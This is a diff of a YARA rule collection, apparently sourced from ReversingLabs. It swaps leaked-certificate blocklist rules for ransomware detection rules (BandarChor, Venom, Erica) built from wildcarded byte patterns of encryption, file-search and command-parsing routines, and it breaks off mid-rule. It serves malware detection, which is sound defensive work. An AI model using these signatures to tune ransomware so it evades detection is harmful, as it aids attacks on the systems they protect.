+            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ??
+            07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ??
+            ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A
+        }
+		$encrypt_folder_p1 = {
+            1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ??
+            ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72
+            ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
+            A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
+        }
+		$encrypt_folder_p2 = {
+            A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13
+            ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69
+            32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69
+            32 ?? 2A
+        }
+		$deep_search_p1 = {
+            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ??
+            ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72
+        }
+		$deep_search_p2 = {
+            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E
+            69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "global trustee" and ( pe.signatures [ i ] . serial == "00:d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" or pe.signatures [ i ] . serial == "d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" ) and 1300060800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_folders ) and ( all of ( $deep_search_p* ) ) and ( all of ( $encrypt_folder_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_750E40Ff97F047Edf556C7084Eb1Abfd : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bandarchor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects BandarChor ransomware."
 		author = "ReversingLabs"
-		id = "7ae4ba81-82be-57f9-aa8c-0e5c30e412c6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c645a081-7ff6-58fc-af8e-55f43f56d0ea"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1019-L1035"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "21c2468905514e1725a206814b0c61c576cf7f97f184bac857bca9283f49a957"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BandarChor.yara#L1-L97"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1c0c33ef7de089fc7ed6b364c7693499d1a93f79a48d6f2a5c375e47aea176bc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BandarChor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$file_extensions_1 = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 51 53 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8B 95 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 85 F9 00 00 00 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 4F FE FF FF E9 ?? ?? ?? ?? 8D 95
+        }
+		$file_extensions_2 = {
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
+        }
+		$file_extensions_3 = {
+            8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+        }
+		$file_extensions_4 = {
+            0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
+        }
+		$file_extensions_5 = {
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
+            }
+		$parse_server_commands = {
+            83 F9 ?? 0F 84 E0 00 00 00 50 53 56 57 89 C3 89 D6 89 CF 31 D2 8A 06 8A 56 ?? 3C ?? 74 25 3C ?? 74 3E 3C ?? 74 51 3C ??
+            74 5C 3C ?? 74 76 3C ?? 0F 84 84 00 00 00 3C ?? 0F 84 8B 00 00 00 E9 97 00 00 00 83 F9 ?? 89 D8 7F 0A E8 ?? ?? ?? ?? E9
+            91 00 00 00 89 CA E8 ?? ?? ?? ?? E9 85 00 00 00 83 F9 ?? 89 D8 7F 07 E8 ?? ?? ?? ?? EB 77 89 CA E8 ?? ?? ?? ?? EB 6E 89
+            D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB 5F 55 89 D5 8B 54 2E ?? 89 D8 03 5C 2E ?? 8B 4C 2E ?? 8B 12 E8 62 FF FF FF 4F 7F
+            E8 5D EB 41 55 89 D5 89 D8 03 5C 2E ?? 89 F2 E8 ?? ?? ?? ?? 4F 7F F0 5D EB 2B 89 D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB
+            1C 89 D8 89 F2 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F1 EB 0B 5F 5E 5B 58 B0 ?? E9 ?? ?? ?? ?? 5F 5E 5B 58 C3 8B C0 B9 ?? ?? ??
+            ?? E9 0A FF FF FF C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "75:0e:40:ff:97:f0:47:ed:f5:56:c7:08:4e:b1:ab:fd" and 980899199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $file_extensions_1 and $file_extensions_2 and $file_extensions_3 and $file_extensions_4 and $file_extensions_5 ) and $parse_server_commands )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1B5190F73724399C9254Cd424637996A : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Venom : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Venom ransomware."
 		author = "ReversingLabs"
-		id = "dfb08450-c35c-5b7b-9d04-2c9a6af9bcf8"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "72149ec2-888e-5bed-baf1-0ec44e48328e"
+		date = "2022-06-06"
+		modified = "2022-06-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1037-L1053"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "08f287ccda93e03a7e796d5625ab35ef0de782d07e5db4e2264f612fc5ebaa21"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Venom.yara#L1-L68"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5817ece6a1cc304835f7fc243c4cfdc3c7cacd2251a9ac294a6662b58d2552e8"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Venom"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_env = {
+            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ??
+            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28
+            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28
+            ?? ?? ?? ?? 00 2A
+        }
+		$find_files = {
+            00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07
+            17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13
+            ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ??
+            26 00 00 DE ?? 2A
+        }
+		$encrypt_files = {
+            00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
+            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06
+            8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ??
+            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ??
+            ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D
+            ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00
+            DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00
+            DE ?? 26 00 00 DE ?? 00 DC 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "1b:51:90:f7:37:24:39:9c:92:54:cd:42:46:37:99:6a" and 980812799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_00Ebaa11D62E2481081820 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Erica : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Erica ransomware."
 		author = "ReversingLabs"
-		id = "e192d271-b5de-5acc-a04f-02a26d9231ac"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "38f57157-bd49-5a63-8c69-497eb9efe274"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1055-L1072"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2fafc6775ec88b5a1000afbc7234fbef6b03e9eaf866dae660dd2d749996cb5c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Erica.yara#L1-L76"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "93512091943f3a3b395c38fa3b0f5ecdbbf1cdf967ccfea4d7145c940076e046"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Erica"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and ( pe.signatures [ i ] . serial == "00:eb:aa:11:d6:2e:24:81:08:18:20" or pe.signatures [ i ] . serial == "eb:aa:11:d6:2e:24:81:08:18:20" ) )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_3Aab11Dee52F1B19D056 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "c6334520-7f93-59d0-8a22-721b928c14d1"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1074-L1089"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1f1215143dc828596e6d7eeff99983755b17eaeb3ab9d7643abdbb48e9957c78"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B F2 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68
+            ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 8A 43 ?? 2C ?? 72 ?? 74 ?? EB ?? BF ??
+            ?? ?? ?? EB ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8B 45 ?? 50
